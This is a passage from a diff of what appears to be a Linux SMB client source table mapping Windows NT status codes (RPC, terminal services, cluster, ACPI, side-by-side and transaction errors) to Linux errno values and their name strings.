+-	{RPC_NT_FP_OVERFLOW, -EIO, "RPC_NT_FP_OVERFLOW"},
+-	{RPC_NT_CALL_IN_PROGRESS, -EIO, "RPC_NT_CALL_IN_PROGRESS"},
+-	{RPC_NT_NO_MORE_BINDINGS, -EIO, "RPC_NT_NO_MORE_BINDINGS"},
+-	{RPC_NT_GROUP_MEMBER_NOT_FOUND, -EIO, "RPC_NT_GROUP_MEMBER_NOT_FOUND"},
+-	{EPT_NT_CANT_CREATE, -EIO, "EPT_NT_CANT_CREATE"},
+-	{RPC_NT_INVALID_OBJECT, -EIO, "RPC_NT_INVALID_OBJECT"},
+-	{RPC_NT_NO_INTERFACES, -EIO, "RPC_NT_NO_INTERFACES"},
+-	{RPC_NT_CALL_CANCELLED, -EIO, "RPC_NT_CALL_CANCELLED"},
+-	{RPC_NT_BINDING_INCOMPLETE, -EIO, "RPC_NT_BINDING_INCOMPLETE"},
+-	{RPC_NT_COMM_FAILURE, -EIO, "RPC_NT_COMM_FAILURE"},
+-	{RPC_NT_UNSUPPORTED_AUTHN_LEVEL, -EIO,
+-	"RPC_NT_UNSUPPORTED_AUTHN_LEVEL"},
+-	{RPC_NT_NO_PRINC_NAME, -EIO, "RPC_NT_NO_PRINC_NAME"},
+-	{RPC_NT_NOT_RPC_ERROR, -EIO, "RPC_NT_NOT_RPC_ERROR"},
+-	{RPC_NT_SEC_PKG_ERROR, -EIO, "RPC_NT_SEC_PKG_ERROR"},
+-	{RPC_NT_NOT_CANCELLED, -EIO, "RPC_NT_NOT_CANCELLED"},
+-	{RPC_NT_INVALID_ASYNC_HANDLE, -EIO, "RPC_NT_INVALID_ASYNC_HANDLE"},
+-	{RPC_NT_INVALID_ASYNC_CALL, -EIO, "RPC_NT_INVALID_ASYNC_CALL"},
+-	{RPC_NT_PROXY_ACCESS_DENIED, -EACCES, "RPC_NT_PROXY_ACCESS_DENIED"},
+-	{RPC_NT_NO_MORE_ENTRIES, -EIO, "RPC_NT_NO_MORE_ENTRIES"},
+-	{RPC_NT_SS_CHAR_TRANS_OPEN_FAIL, -EIO,
+-	"RPC_NT_SS_CHAR_TRANS_OPEN_FAIL"},
+-	{RPC_NT_SS_CHAR_TRANS_SHORT_FILE, -EIO,
+-	"RPC_NT_SS_CHAR_TRANS_SHORT_FILE"},
+-	{RPC_NT_SS_IN_NULL_CONTEXT, -EIO, "RPC_NT_SS_IN_NULL_CONTEXT"},
+-	{RPC_NT_SS_CONTEXT_MISMATCH, -EIO, "RPC_NT_SS_CONTEXT_MISMATCH"},
+-	{RPC_NT_SS_CONTEXT_DAMAGED, -EIO, "RPC_NT_SS_CONTEXT_DAMAGED"},
+-	{RPC_NT_SS_HANDLES_MISMATCH, -EIO, "RPC_NT_SS_HANDLES_MISMATCH"},
+-	{RPC_NT_SS_CANNOT_GET_CALL_HANDLE, -EIO,
+-	"RPC_NT_SS_CANNOT_GET_CALL_HANDLE"},
+-	{RPC_NT_NULL_REF_POINTER, -EIO, "RPC_NT_NULL_REF_POINTER"},
+-	{RPC_NT_ENUM_VALUE_OUT_OF_RANGE, -EIO,
+-	"RPC_NT_ENUM_VALUE_OUT_OF_RANGE"},
+-	{RPC_NT_BYTE_COUNT_TOO_SMALL, -EIO, "RPC_NT_BYTE_COUNT_TOO_SMALL"},
+-	{RPC_NT_BAD_STUB_DATA, -EIO, "RPC_NT_BAD_STUB_DATA"},
+-	{RPC_NT_INVALID_ES_ACTION, -EIO, "RPC_NT_INVALID_ES_ACTION"},
+-	{RPC_NT_WRONG_ES_VERSION, -EIO, "RPC_NT_WRONG_ES_VERSION"},
+-	{RPC_NT_WRONG_STUB_VERSION, -EIO, "RPC_NT_WRONG_STUB_VERSION"},
+-	{RPC_NT_INVALID_PIPE_OBJECT, -EIO, "RPC_NT_INVALID_PIPE_OBJECT"},
+-	{RPC_NT_INVALID_PIPE_OPERATION, -EIO, "RPC_NT_INVALID_PIPE_OPERATION"},
+-	{RPC_NT_WRONG_PIPE_VERSION, -EIO, "RPC_NT_WRONG_PIPE_VERSION"},
+-	{RPC_NT_PIPE_CLOSED, -EIO, "RPC_NT_PIPE_CLOSED"},
+-	{RPC_NT_PIPE_DISCIPLINE_ERROR, -EIO, "RPC_NT_PIPE_DISCIPLINE_ERROR"},
+-	{RPC_NT_PIPE_EMPTY, -EIO, "RPC_NT_PIPE_EMPTY"},
+-	{STATUS_PNP_BAD_MPS_TABLE, -EIO, "STATUS_PNP_BAD_MPS_TABLE"},
+-	{STATUS_PNP_TRANSLATION_FAILED, -EIO, "STATUS_PNP_TRANSLATION_FAILED"},
+-	{STATUS_PNP_IRQ_TRANSLATION_FAILED, -EIO,
+-	"STATUS_PNP_IRQ_TRANSLATION_FAILED"},
+-	{STATUS_PNP_INVALID_ID, -EIO, "STATUS_PNP_INVALID_ID"},
+-	{STATUS_IO_REISSUE_AS_CACHED, -EIO, "STATUS_IO_REISSUE_AS_CACHED"},
+-	{STATUS_CTX_WINSTATION_NAME_INVALID, -EIO,
+-	"STATUS_CTX_WINSTATION_NAME_INVALID"},
+-	{STATUS_CTX_INVALID_PD, -EIO, "STATUS_CTX_INVALID_PD"},
+-	{STATUS_CTX_PD_NOT_FOUND, -EIO, "STATUS_CTX_PD_NOT_FOUND"},
+-	{STATUS_CTX_CLOSE_PENDING, -EIO, "STATUS_CTX_CLOSE_PENDING"},
+-	{STATUS_CTX_NO_OUTBUF, -EIO, "STATUS_CTX_NO_OUTBUF"},
+-	{STATUS_CTX_MODEM_INF_NOT_FOUND, -EIO,
+-	"STATUS_CTX_MODEM_INF_NOT_FOUND"},
+-	{STATUS_CTX_INVALID_MODEMNAME, -EIO, "STATUS_CTX_INVALID_MODEMNAME"},
+-	{STATUS_CTX_RESPONSE_ERROR, -EIO, "STATUS_CTX_RESPONSE_ERROR"},
+-	{STATUS_CTX_MODEM_RESPONSE_TIMEOUT, -ETIMEDOUT,
+-	"STATUS_CTX_MODEM_RESPONSE_TIMEOUT"},
+-	{STATUS_CTX_MODEM_RESPONSE_NO_CARRIER, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_NO_CARRIER"},
+-	{STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE"},
+-	{STATUS_CTX_MODEM_RESPONSE_BUSY, -EBUSY,
+-	"STATUS_CTX_MODEM_RESPONSE_BUSY"},
+-	{STATUS_CTX_MODEM_RESPONSE_VOICE, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_VOICE"},
+-	{STATUS_CTX_TD_ERROR, -EIO, "STATUS_CTX_TD_ERROR"},
+-	{STATUS_CTX_LICENSE_CLIENT_INVALID, -EIO,
+-	"STATUS_CTX_LICENSE_CLIENT_INVALID"},
+-	{STATUS_CTX_LICENSE_NOT_AVAILABLE, -EIO,
+-	"STATUS_CTX_LICENSE_NOT_AVAILABLE"},
+-	{STATUS_CTX_LICENSE_EXPIRED, -EIO, "STATUS_CTX_LICENSE_EXPIRED"},
+-	{STATUS_CTX_WINSTATION_NOT_FOUND, -EIO,
+-	"STATUS_CTX_WINSTATION_NOT_FOUND"},
+-	{STATUS_CTX_WINSTATION_NAME_COLLISION, -EIO,
+-	"STATUS_CTX_WINSTATION_NAME_COLLISION"},
+-	{STATUS_CTX_WINSTATION_BUSY, -EBUSY, "STATUS_CTX_WINSTATION_BUSY"},
+-	{STATUS_CTX_BAD_VIDEO_MODE, -EIO, "STATUS_CTX_BAD_VIDEO_MODE"},
+-	{STATUS_CTX_GRAPHICS_INVALID, -EIO, "STATUS_CTX_GRAPHICS_INVALID"},
+-	{STATUS_CTX_NOT_CONSOLE, -EIO, "STATUS_CTX_NOT_CONSOLE"},
+-	{STATUS_CTX_CLIENT_QUERY_TIMEOUT, -EIO,
+-	"STATUS_CTX_CLIENT_QUERY_TIMEOUT"},
+-	{STATUS_CTX_CONSOLE_DISCONNECT, -EIO, "STATUS_CTX_CONSOLE_DISCONNECT"},
+-	{STATUS_CTX_CONSOLE_CONNECT, -EIO, "STATUS_CTX_CONSOLE_CONNECT"},
+-	{STATUS_CTX_SHADOW_DENIED, -EIO, "STATUS_CTX_SHADOW_DENIED"},
+-	{STATUS_CTX_WINSTATION_ACCESS_DENIED, -EACCES,
+-	"STATUS_CTX_WINSTATION_ACCESS_DENIED"},
+-	{STATUS_CTX_INVALID_WD, -EIO, "STATUS_CTX_INVALID_WD"},
+-	{STATUS_CTX_WD_NOT_FOUND, -EIO, "STATUS_CTX_WD_NOT_FOUND"},
+-	{STATUS_CTX_SHADOW_INVALID, -EIO, "STATUS_CTX_SHADOW_INVALID"},
+-	{STATUS_CTX_SHADOW_DISABLED, -EIO, "STATUS_CTX_SHADOW_DISABLED"},
+-	{STATUS_RDP_PROTOCOL_ERROR, -EIO, "STATUS_RDP_PROTOCOL_ERROR"},
+-	{STATUS_CTX_CLIENT_LICENSE_NOT_SET, -EIO,
+-	"STATUS_CTX_CLIENT_LICENSE_NOT_SET"},
+-	{STATUS_CTX_CLIENT_LICENSE_IN_USE, -EIO,
+-	"STATUS_CTX_CLIENT_LICENSE_IN_USE"},
+-	{STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE, -EIO,
+-	"STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE"},
+-	{STATUS_CTX_SHADOW_NOT_RUNNING, -EIO, "STATUS_CTX_SHADOW_NOT_RUNNING"},
+-	{STATUS_CTX_LOGON_DISABLED, -EIO, "STATUS_CTX_LOGON_DISABLED"},
+-	{STATUS_CTX_SECURITY_LAYER_ERROR, -EIO,
+-	"STATUS_CTX_SECURITY_LAYER_ERROR"},
+-	{STATUS_TS_INCOMPATIBLE_SESSIONS, -EIO,
+-	"STATUS_TS_INCOMPATIBLE_SESSIONS"},
+-	{STATUS_MUI_FILE_NOT_FOUND, -EIO, "STATUS_MUI_FILE_NOT_FOUND"},
+-	{STATUS_MUI_INVALID_FILE, -EIO, "STATUS_MUI_INVALID_FILE"},
+-	{STATUS_MUI_INVALID_RC_CONFIG, -EIO, "STATUS_MUI_INVALID_RC_CONFIG"},
+-	{STATUS_MUI_INVALID_LOCALE_NAME, -EIO,
+-	"STATUS_MUI_INVALID_LOCALE_NAME"},
+-	{STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME, -EIO,
+-	"STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME"},
+-	{STATUS_MUI_FILE_NOT_LOADED, -EIO, "STATUS_MUI_FILE_NOT_LOADED"},
+-	{STATUS_RESOURCE_ENUM_USER_STOP, -EIO,
+-	"STATUS_RESOURCE_ENUM_USER_STOP"},
+-	{STATUS_CLUSTER_INVALID_NODE, -EIO, "STATUS_CLUSTER_INVALID_NODE"},
+-	{STATUS_CLUSTER_NODE_EXISTS, -EIO, "STATUS_CLUSTER_NODE_EXISTS"},
+-	{STATUS_CLUSTER_JOIN_IN_PROGRESS, -EIO,
+-	"STATUS_CLUSTER_JOIN_IN_PROGRESS"},
+-	{STATUS_CLUSTER_NODE_NOT_FOUND, -EIO, "STATUS_CLUSTER_NODE_NOT_FOUND"},
+-	{STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND"},
+-	{STATUS_CLUSTER_NETWORK_EXISTS, -EIO, "STATUS_CLUSTER_NETWORK_EXISTS"},
+-	{STATUS_CLUSTER_NETWORK_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_NETWORK_NOT_FOUND"},
+-	{STATUS_CLUSTER_NETINTERFACE_EXISTS, -EIO,
+-	"STATUS_CLUSTER_NETINTERFACE_EXISTS"},
+-	{STATUS_CLUSTER_NETINTERFACE_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_NETINTERFACE_NOT_FOUND"},
+-	{STATUS_CLUSTER_INVALID_REQUEST, -EIO,
+-	"STATUS_CLUSTER_INVALID_REQUEST"},
+-	{STATUS_CLUSTER_INVALID_NETWORK_PROVIDER, -EIO,
+-	"STATUS_CLUSTER_INVALID_NETWORK_PROVIDER"},
+-	{STATUS_CLUSTER_NODE_DOWN, -EIO, "STATUS_CLUSTER_NODE_DOWN"},
+-	{STATUS_CLUSTER_NODE_UNREACHABLE, -EIO,
+-	"STATUS_CLUSTER_NODE_UNREACHABLE"},
+-	{STATUS_CLUSTER_NODE_NOT_MEMBER, -EIO,
+-	"STATUS_CLUSTER_NODE_NOT_MEMBER"},
+-	{STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS, -EIO,
+-	"STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS"},
+-	{STATUS_CLUSTER_INVALID_NETWORK, -EIO,
+-	"STATUS_CLUSTER_INVALID_NETWORK"},
+-	{STATUS_CLUSTER_NO_NET_ADAPTERS, -EIO,
+-	"STATUS_CLUSTER_NO_NET_ADAPTERS"},
+-	{STATUS_CLUSTER_NODE_UP, -EIO, "STATUS_CLUSTER_NODE_UP"},
+-	{STATUS_CLUSTER_NODE_PAUSED, -EIO, "STATUS_CLUSTER_NODE_PAUSED"},
+-	{STATUS_CLUSTER_NODE_NOT_PAUSED, -EIO,
+-	"STATUS_CLUSTER_NODE_NOT_PAUSED"},
+-	{STATUS_CLUSTER_NO_SECURITY_CONTEXT, -EIO,
+-	"STATUS_CLUSTER_NO_SECURITY_CONTEXT"},
+-	{STATUS_CLUSTER_NETWORK_NOT_INTERNAL, -EIO,
+-	"STATUS_CLUSTER_NETWORK_NOT_INTERNAL"},
+-	{STATUS_CLUSTER_POISONED, -EIO, "STATUS_CLUSTER_POISONED"},
+-	{STATUS_ACPI_INVALID_OPCODE, -EIO, "STATUS_ACPI_INVALID_OPCODE"},
+-	{STATUS_ACPI_STACK_OVERFLOW, -EIO, "STATUS_ACPI_STACK_OVERFLOW"},
+-	{STATUS_ACPI_ASSERT_FAILED, -EIO, "STATUS_ACPI_ASSERT_FAILED"},
+-	{STATUS_ACPI_INVALID_INDEX, -EIO, "STATUS_ACPI_INVALID_INDEX"},
+-	{STATUS_ACPI_INVALID_ARGUMENT, -EIO, "STATUS_ACPI_INVALID_ARGUMENT"},
+-	{STATUS_ACPI_FATAL, -EIO, "STATUS_ACPI_FATAL"},
+-	{STATUS_ACPI_INVALID_SUPERNAME, -EIO, "STATUS_ACPI_INVALID_SUPERNAME"},
+-	{STATUS_ACPI_INVALID_ARGTYPE, -EIO, "STATUS_ACPI_INVALID_ARGTYPE"},
+-	{STATUS_ACPI_INVALID_OBJTYPE, -EIO, "STATUS_ACPI_INVALID_OBJTYPE"},
+-	{STATUS_ACPI_INVALID_TARGETTYPE, -EIO,
+-	"STATUS_ACPI_INVALID_TARGETTYPE"},
+-	{STATUS_ACPI_INCORRECT_ARGUMENT_COUNT, -EIO,
+-	"STATUS_ACPI_INCORRECT_ARGUMENT_COUNT"},
+-	{STATUS_ACPI_ADDRESS_NOT_MAPPED, -EIO,
+-	"STATUS_ACPI_ADDRESS_NOT_MAPPED"},
+-	{STATUS_ACPI_INVALID_EVENTTYPE, -EIO, "STATUS_ACPI_INVALID_EVENTTYPE"},
+-	{STATUS_ACPI_HANDLER_COLLISION, -EIO, "STATUS_ACPI_HANDLER_COLLISION"},
+-	{STATUS_ACPI_INVALID_DATA, -EIO, "STATUS_ACPI_INVALID_DATA"},
+-	{STATUS_ACPI_INVALID_REGION, -EIO, "STATUS_ACPI_INVALID_REGION"},
+-	{STATUS_ACPI_INVALID_ACCESS_SIZE, -EIO,
+-	"STATUS_ACPI_INVALID_ACCESS_SIZE"},
+-	{STATUS_ACPI_ACQUIRE_GLOBAL_LOCK, -EIO,
+-	"STATUS_ACPI_ACQUIRE_GLOBAL_LOCK"},
+-	{STATUS_ACPI_ALREADY_INITIALIZED, -EIO,
+-	"STATUS_ACPI_ALREADY_INITIALIZED"},
+-	{STATUS_ACPI_NOT_INITIALIZED, -EIO, "STATUS_ACPI_NOT_INITIALIZED"},
+-	{STATUS_ACPI_INVALID_MUTEX_LEVEL, -EIO,
+-	"STATUS_ACPI_INVALID_MUTEX_LEVEL"},
+-	{STATUS_ACPI_MUTEX_NOT_OWNED, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNED"},
+-	{STATUS_ACPI_MUTEX_NOT_OWNER, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNER"},
+-	{STATUS_ACPI_RS_ACCESS, -EIO, "STATUS_ACPI_RS_ACCESS"},
+-	{STATUS_ACPI_INVALID_TABLE, -EIO, "STATUS_ACPI_INVALID_TABLE"},
+-	{STATUS_ACPI_REG_HANDLER_FAILED, -EIO,
+-	"STATUS_ACPI_REG_HANDLER_FAILED"},
+-	{STATUS_ACPI_POWER_REQUEST_FAILED, -EIO,
+-	"STATUS_ACPI_POWER_REQUEST_FAILED"},
+-	{STATUS_SXS_SECTION_NOT_FOUND, -EIO, "STATUS_SXS_SECTION_NOT_FOUND"},
+-	{STATUS_SXS_CANT_GEN_ACTCTX, -EIO, "STATUS_SXS_CANT_GEN_ACTCTX"},
+-	{STATUS_SXS_INVALID_ACTCTXDATA_FORMAT, -EIO,
+-	"STATUS_SXS_INVALID_ACTCTXDATA_FORMAT"},
+-	{STATUS_SXS_ASSEMBLY_NOT_FOUND, -EIO, "STATUS_SXS_ASSEMBLY_NOT_FOUND"},
+-	{STATUS_SXS_MANIFEST_FORMAT_ERROR, -EIO,
+-	"STATUS_SXS_MANIFEST_FORMAT_ERROR"},
+-	{STATUS_SXS_MANIFEST_PARSE_ERROR, -EIO,
+-	"STATUS_SXS_MANIFEST_PARSE_ERROR"},
+-	{STATUS_SXS_ACTIVATION_CONTEXT_DISABLED, -EIO,
+-	"STATUS_SXS_ACTIVATION_CONTEXT_DISABLED"},
+-	{STATUS_SXS_KEY_NOT_FOUND, -EIO, "STATUS_SXS_KEY_NOT_FOUND"},
+-	{STATUS_SXS_VERSION_CONFLICT, -EIO, "STATUS_SXS_VERSION_CONFLICT"},
+-	{STATUS_SXS_WRONG_SECTION_TYPE, -EIO, "STATUS_SXS_WRONG_SECTION_TYPE"},
+-	{STATUS_SXS_THREAD_QUERIES_DISABLED, -EIO,
+-	"STATUS_SXS_THREAD_QUERIES_DISABLED"},
+-	{STATUS_SXS_ASSEMBLY_MISSING, -EIO, "STATUS_SXS_ASSEMBLY_MISSING"},
+-	{STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET, -EIO,
+-	"STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET"},
+-	{STATUS_SXS_EARLY_DEACTIVATION, -EIO, "STATUS_SXS_EARLY_DEACTIVATION"},
+-	{STATUS_SXS_INVALID_DEACTIVATION, -EIO,
+-	"STATUS_SXS_INVALID_DEACTIVATION"},
+-	{STATUS_SXS_MULTIPLE_DEACTIVATION, -EIO,
+-	"STATUS_SXS_MULTIPLE_DEACTIVATION"},
+-	{STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY, -EIO,
+-	"STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY"},
+-	{STATUS_SXS_PROCESS_TERMINATION_REQUESTED, -EIO,
+-	"STATUS_SXS_PROCESS_TERMINATION_REQUESTED"},
+-	{STATUS_SXS_CORRUPT_ACTIVATION_STACK, -EIO,
+-	"STATUS_SXS_CORRUPT_ACTIVATION_STACK"},
+-	{STATUS_SXS_CORRUPTION, -EIO, "STATUS_SXS_CORRUPTION"},
+-	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE, -EIO,
+-	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE"},
+-	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME, -EIO,
+-	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME"},
+-	{STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE, -EIO,
+-	"STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE"},
+-	{STATUS_SXS_IDENTITY_PARSE_ERROR, -EIO,
+-	"STATUS_SXS_IDENTITY_PARSE_ERROR"},
+-	{STATUS_SXS_COMPONENT_STORE_CORRUPT, -EIO,
+-	"STATUS_SXS_COMPONENT_STORE_CORRUPT"},
+-	{STATUS_SXS_FILE_HASH_MISMATCH, -EIO, "STATUS_SXS_FILE_HASH_MISMATCH"},
+-	{STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT, -EIO,
+-	"STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT"},
+-	{STATUS_SXS_IDENTITIES_DIFFERENT, -EIO,
+-	"STATUS_SXS_IDENTITIES_DIFFERENT"},
+-	{STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT, -EIO,
+-	"STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT"},
+-	{STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY, -EIO,
+-	"STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY"},
+-	{STATUS_ADVANCED_INSTALLER_FAILED, -EIO,
+-	"STATUS_ADVANCED_INSTALLER_FAILED"},
+-	{STATUS_XML_ENCODING_MISMATCH, -EIO, "STATUS_XML_ENCODING_MISMATCH"},
+-	{STATUS_SXS_MANIFEST_TOO_BIG, -EIO, "STATUS_SXS_MANIFEST_TOO_BIG"},
+-	{STATUS_SXS_SETTING_NOT_REGISTERED, -EIO,
+-	"STATUS_SXS_SETTING_NOT_REGISTERED"},
+-	{STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE, -EIO,
+-	"STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE"},
+-	{STATUS_SMI_PRIMITIVE_INSTALLER_FAILED, -EIO,
+-	"STATUS_SMI_PRIMITIVE_INSTALLER_FAILED"},
+-	{STATUS_GENERIC_COMMAND_FAILED, -EIO, "STATUS_GENERIC_COMMAND_FAILED"},
+-	{STATUS_SXS_FILE_HASH_MISSING, -EIO, "STATUS_SXS_FILE_HASH_MISSING"},
+-	{STATUS_TRANSACTIONAL_CONFLICT, -EIO, "STATUS_TRANSACTIONAL_CONFLICT"},
+-	{STATUS_INVALID_TRANSACTION, -EIO, "STATUS_INVALID_TRANSACTION"},
+-	{STATUS_TRANSACTION_NOT_ACTIVE, -EIO, "STATUS_TRANSACTION_NOT_ACTIVE"},
+-	{STATUS_TM_INITIALIZATION_FAILED, -EIO,
+-	"STATUS_TM_INITIALIZATION_FAILED"},
+-	{STATUS_RM_NOT_ACTIVE, -EIO, "STATUS_RM_NOT_ACTIVE"},
+-	{STATUS_RM_METADATA_CORRUPT, -EIO, "STATUS_RM_METADATA_CORRUPT"},
+-	{STATUS_TRANSACTION_NOT_JOINED, -EIO, "STATUS_TRANSACTION_NOT_JOINED"},
+-	{STATUS_DIRECTORY_NOT_RM, -EIO, "STATUS_DIRECTORY_NOT_RM"},
+-	{STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE, -EIO,
+-	"STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE"},
+-	{STATUS_LOG_RESIZE_INVALID_SIZE, -EIO,
+-	"STATUS_LOG_RESIZE_INVALID_SIZE"},
+-	{STATUS_REMOTE_FILE_VERSION_MISMATCH, -EIO,
+-	"STATUS_REMOTE_FILE_VERSION_MISMATCH"},
+-	{STATUS_CRM_PROTOCOL_ALREADY_EXISTS, -EIO,
+-	"STATUS_CRM_PROTOCOL_ALREADY_EXISTS"},
+-	{STATUS_TRANSACTION_PROPAGATION_FAILED, -EIO,
+-	"STATUS_TRANSACTION_PROPAGATION_FAILED"},
+-	{STATUS_CRM_PROTOCOL_NOT_FOUND, -EIO, "STATUS_CRM_PROTOCOL_NOT_FOUND"},
+-	{STATUS_TRANSACTION_SUPERIOR_EXISTS, -EIO,
+-	"STATUS_TRANSACTION_SUPERIOR_EXISTS"},
+-	{STATUS_TRANSACTION_REQUEST_NOT_VALID, -EIO,
+-	"STATUS_TRANSACTION_REQUEST_NOT_VALID"},
+-	{STATUS_TRANSACTION_NOT_REQUESTED, -EIO,
+-	"STATUS_TRANSACTION_NOT_REQUESTED"},
+-	{STATUS_TRANSACTION_ALREADY_ABORTED, -EIO,
+-	"STATUS_TRANSACTION_ALREADY_ABORTED"},
+-	{STATUS_TRANSACTION_ALREADY_COMMITTED, -EIO,
+-	"STATUS_TRANSACTION_ALREADY_COMMITTED"},
+-	{STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER, -EIO,
+-	"STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER"},
+-	{STATUS_CURRENT_TRANSACTION_NOT_VALID, -EIO,
+-	"STATUS_CURRENT_TRANSACTION_NOT_VALID"},
+-	{STATUS_LOG_GROWTH_FAILED, -EIO, "STATUS_LOG_GROWTH_FAILED"},
+-	{STATUS_OBJECT_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_OBJECT_NO_LONGER_EXISTS"},
+-	{STATUS_STREAM_MINIVERSION_NOT_FOUND, -EIO,
+-	"STATUS_STREAM_MINIVERSION_NOT_FOUND"},
+-	{STATUS_STREAM_MINIVERSION_NOT_VALID, -EIO,
+-	"STATUS_STREAM_MINIVERSION_NOT_VALID"},
+-	{STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION, -EIO,
+-	"STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION"},
+-	{STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT, -EIO,
+-	"STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT"},
+-	{STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS, -EIO,
+-	"STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS"},
+-	{STATUS_HANDLE_NO_LONGER_VALID, -EIO, "STATUS_HANDLE_NO_LONGER_VALID"},
+-	{STATUS_LOG_CORRUPTION_DETECTED, -EIO,
+-	"STATUS_LOG_CORRUPTION_DETECTED"},
+-	{STATUS_RM_DISCONNECTED, -EIO, "STATUS_RM_DISCONNECTED"},
+-	{STATUS_ENLISTMENT_NOT_SUPERIOR, -EIO,
+-	"STATUS_ENLISTMENT_NOT_SUPERIOR"},
+-	{STATUS_FILE_IDENTITY_NOT_PERSISTENT, -EIO,
+-	"STATUS_FILE_IDENTITY_NOT_PERSISTENT"},
+-	{STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY, -EIO,
+-	"STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY"},
+-	{STATUS_CANT_CROSS_RM_BOUNDARY, -EIO, "STATUS_CANT_CROSS_RM_BOUNDARY"},
+-	{STATUS_TXF_DIR_NOT_EMPTY, -EIO, "STATUS_TXF_DIR_NOT_EMPTY"},
+-	{STATUS_INDOUBT_TRANSACTIONS_EXIST, -EIO,
+-	"STATUS_INDOUBT_TRANSACTIONS_EXIST"},
+-	{STATUS_TM_VOLATILE, -EIO, "STATUS_TM_VOLATILE"},
+-	{STATUS_ROLLBACK_TIMER_EXPIRED, -EIO, "STATUS_ROLLBACK_TIMER_EXPIRED"},
+-	{STATUS_TXF_ATTRIBUTE_CORRUPT, -EIO, "STATUS_TXF_ATTRIBUTE_CORRUPT"},
+-	{STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED, -EIO,
+-	"STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED"},
+-	{STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE, -EIO,
+-	"STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE"},
+-	{STATUS_TRANSACTION_REQUIRED_PROMOTION, -EIO,
+-	"STATUS_TRANSACTION_REQUIRED_PROMOTION"},
+-	{STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION, -EIO,
+-	"STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION"},
+-	{STATUS_TRANSACTIONS_NOT_FROZEN, -EIO,
+-	"STATUS_TRANSACTIONS_NOT_FROZEN"},
+-	{STATUS_TRANSACTION_FREEZE_IN_PROGRESS, -EIO,
+-	"STATUS_TRANSACTION_FREEZE_IN_PROGRESS"},
+-	{STATUS_NOT_SNAPSHOT_VOLUME, -EIO, "STATUS_NOT_SNAPSHOT_VOLUME"},
+-	{STATUS_NO_SAVEPOINT_WITH_OPEN_FILES, -EIO,
+-	"STATUS_NO_SAVEPOINT_WITH_OPEN_FILES"},
+-	{STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TM_IDENTITY_MISMATCH, -EIO, "STATUS_TM_IDENTITY_MISMATCH"},
+-	{STATUS_FLOATED_SECTION, -EIO, "STATUS_FLOATED_SECTION"},
+-	{STATUS_CANNOT_ACCEPT_TRANSACTED_WORK, -EIO,
+-	"STATUS_CANNOT_ACCEPT_TRANSACTED_WORK"},
+-	{STATUS_CANNOT_ABORT_TRANSACTIONS, -EIO,
+-	"STATUS_CANNOT_ABORT_TRANSACTIONS"},
+-	{STATUS_TRANSACTION_NOT_FOUND, -EIO, "STATUS_TRANSACTION_NOT_FOUND"},
+-	{STATUS_RESOURCEMANAGER_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCEMANAGER_NOT_FOUND"},
+-	{STATUS_ENLISTMENT_NOT_FOUND, -EIO, "STATUS_ENLISTMENT_NOT_FOUND"},
+-	{STATUS_TRANSACTIONMANAGER_NOT_FOUND, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_NOT_FOUND"},
